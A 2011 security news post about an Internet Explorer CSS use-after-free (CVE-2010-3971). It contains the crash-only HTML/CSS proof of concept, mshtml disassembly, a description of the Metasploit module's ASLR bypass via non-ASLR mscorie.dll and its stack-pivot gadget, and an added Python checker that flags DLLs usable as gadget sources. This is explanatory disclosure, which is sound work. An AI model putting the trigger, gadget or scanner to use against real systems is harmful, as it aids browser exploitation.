Error in recursive CSS processing in IE 6/7/8 (CVE-2010-3971)
16 March 2011, 14:04
Not so long ago, at the beginning of December to be precise, a bug in the recursive processing of CSS in several versions of IE was disclosed. The PoC that was published could only crash the browser, and nobody managed to squeeze anything more meaningful out of it until this week, when a full working exploit for the vulnerability appeared in Metasploit.

The PoC originally looked like this:
<code>
<div style="position: absolute; top: -999px; left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</div>
</code>

css.css:
<code>
* {
color: red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>

The bug is memory corruption in the HTML parser (mshtml.dll): while processing a page that contains a recursive CSS include, the CStyleSheet object is freed inside Notify, and the freed memory region can later be reused to redirect control flow to arbitrary code (a classic use-after-free).

mshtml!CSharedStyleSheet::Notify:
3ced63a5 8bff            mov     edi, edi
3ced63a7 55              push    ebp
3ced63a8 8bec            mov     ebp, esp
3ced63aa 51              push    ecx
3ced63ab 56              push    esi
3ced63ac 8bb1d0000000    mov     esi, dword ptr [ecx+0D0h]   ; esi = 0x14
3ced63b2 57              push    edi
3ced63b3 8bb9d8000000    mov     edi, dword ptr [ecx+0D8h]   ; pointer to the array of CStyleSheet objects
3ced63b9 33c0            xor     eax, eax
3ced63bb c1ee02          shr     esi, 2                      ; esi = 0x5

The vulnerability itself is nothing special, but the way the Metasploit crew implemented exploitation of it really deserves attention. Interestingly, besides the standard heap spray, the module uses ROP (return oriented programming) through .NET, which is rather unusual. More precisely, it relies on a property of mscorie.dll from .NET Framework 2.0: the library was built without the /DYNAMICBASE flag, so ASLR does not apply to it and it always loads at the same base address (0x63f00000). This oversight by the developers makes it possible to use ROP to call system functions from the shellcode.

Example stack pivot gadget for the ROP chain:
mscorie!_chkstk+0x1b:
63f0575b 94              xchg    eax, esp
63f0575c 8b00            mov     eax, dword ptr [eax]
63f0575e 890424          mov     dword ptr [esp], eax
63f05761 c3              ret
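The pivot works because, at the moment of the hijacked call, eax points into the sprayed heap block: `xchg eax, esp` turns that block into the stack, `mov eax, [eax]` reads the first dword of the block, `mov [esp], eax` writes it back to the new stack top and `ret` pops it, so the first dword of every sprayed block has to be the address of the next gadget. Whether a DLL can serve as such a gadget source depends on exactly the two properties described above: it opts out of ASLR at link time (no IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE bit in DllCharacteristics, hence a fixed ImageBase) and it contains a usable pivot. The following checker is an added example, not code from the post or from the Metasploit module; it parses PE32 headers with `struct` and scans the sections for the `94 8b 00 89 04 24 c3` byte sequence of the gadget. The sample image it builds is constructed in memory with the base address and gadget address quoted in the post, and is not the real mscorie.dll. Note that the flag check only reflects the link-time opt-in: EMET's mandatory ASLR, mentioned below, relocates such images anyway, which is why Microsoft recommends it.

```python
"""
Added example (not from the post or the Metasploit module): a PE32 checker for
the two properties the ROP chain relies on, i.e. that a DLL opts out of ASLR
(DllCharacteristics lacks IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, so it loads at
its linked ImageBase) and that it contains an
"xchg eax,esp / mov eax,[eax] / mov [esp],eax / ret" stack-pivot gadget.
"""
import struct
import sys

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # /DYNAMICBASE: ASLR-compatible
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # /NXCOMPAT: DEP-compatible
# 94 8b 00 89 04 24 c3 = xchg eax,esp ; mov eax,[eax] ; mov [esp],eax ; ret
PIVOT_GADGET = bytes.fromhex("948b00890424c3")


def parse_pe(data: bytes) -> dict:
    """Return ImageBase, DllCharacteristics and the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]     # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]     # SizeOfOptionalHeader
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:          # PE32 magic
        raise ValueError("only PE32 (32-bit) images are handled here")
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    sections = []
    sec_hdr = opt + opt_size
    for i in range(nsections):
        name, _vsize, rva, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, sec_hdr + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "rva": rva, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"image_base": image_base, "dll_characteristics": dll_chars,
            "sections": sections}


def mitigation_status(info: dict) -> dict:
    """Report whether the image opted in to ASLR and DEP at link time."""
    chars = info["dll_characteristics"]
    return {"dynamic_base": bool(chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
            "nx_compat": bool(chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT)}


def find_pivot_gadgets(data: bytes, info: dict) -> list:
    """Virtual addresses of every pivot gadget in the image's sections, computed as
    ImageBase + section RVA + offset in the raw section data. These addresses are
    only reliable ROP targets when the image is not relocated (dynamic_base False)."""
    hits = []
    for s in info["sections"]:
        raw = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        pos = raw.find(PIVOT_GADGET)
        while pos >= 0:
            hits.append(info["image_base"] + s["rva"] + pos)
            pos = raw.find(PIVOT_GADGET, pos + 1)
    return hits


def build_sample_dll(dynamic_base: bool) -> bytes:
    """Constructed minimal PE32 image for the demo (NOT the real mscorie.dll):
    ImageBase 0x63F00000 and one .text section with the pivot gadget planted so
    that it lands at 0x63F0575B, the address quoted in the post."""
    image_base, sec_rva, sec_raw, sec_size, gadget_off = 0x63F00000, 0x5000, 0x400, 0x800, 0x75B
    text = bytearray(b"\xcc" * sec_size)                  # int3 filler
    text[gadget_off:gadget_off + len(PIVOT_GADGET)] = PIVOT_GADGET
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, 1 section, DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<III", opt, 28, image_base, 0x1000, 0x200)     # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<H", opt, 70, IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE if dynamic_base else 0)
    section = struct.pack("<8sIIIIIIHHI", b".text", sec_size, sec_rva, sec_size, sec_raw,
                          0, 0, 0, 0, 0x60000020)                    # code, execute, read
    image = bytearray(dos + b"PE\0\0" + coff + bytes(opt) + section)
    image += b"\0" * (sec_raw - len(image)) + text
    return bytes(image)


def audit(data: bytes) -> dict:
    """Combine both checks into one verdict for a DLL image."""
    info = parse_pe(data)
    status = mitigation_status(info)
    gadgets = find_pivot_gadgets(data, info)
    status.update({"image_base": info["image_base"], "pivot_gadgets": gadgets,
                   "usable_for_aslr_bypass": (not status["dynamic_base"]) and bool(gadgets)})
    return status


if __name__ == "__main__":
    # Pass a real 32-bit DLL path to audit it; with no argument the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dll(False)
    result = audit(blob)
    result["image_base"] = hex(result["image_base"])
    result["pivot_gadgets"] = [hex(a) for a in result["pivot_gadgets"]]
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it against a real 32-bit DLL with `python checker.py C:\path\to\some.dll`; a module that reports `dynamic_base: False` together with a non-empty gadget list is exactly the kind of ASLR-bypass source the Metasploit chain uses, and the same DllCharacteristics bits are what EMET's mandatory ASLR and DEP settings override at load time.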

Microsoft released Security Advisory 2488013 on the subject yesterday, and the vulnerability will presumably be closed in the next batch of updates. In the meantime the folks at MS recommend using EMET (Enhanced Mitigation Experience Toolkit) to counter the ASLR bypass via the ROP vector described above.
Added by: w1zard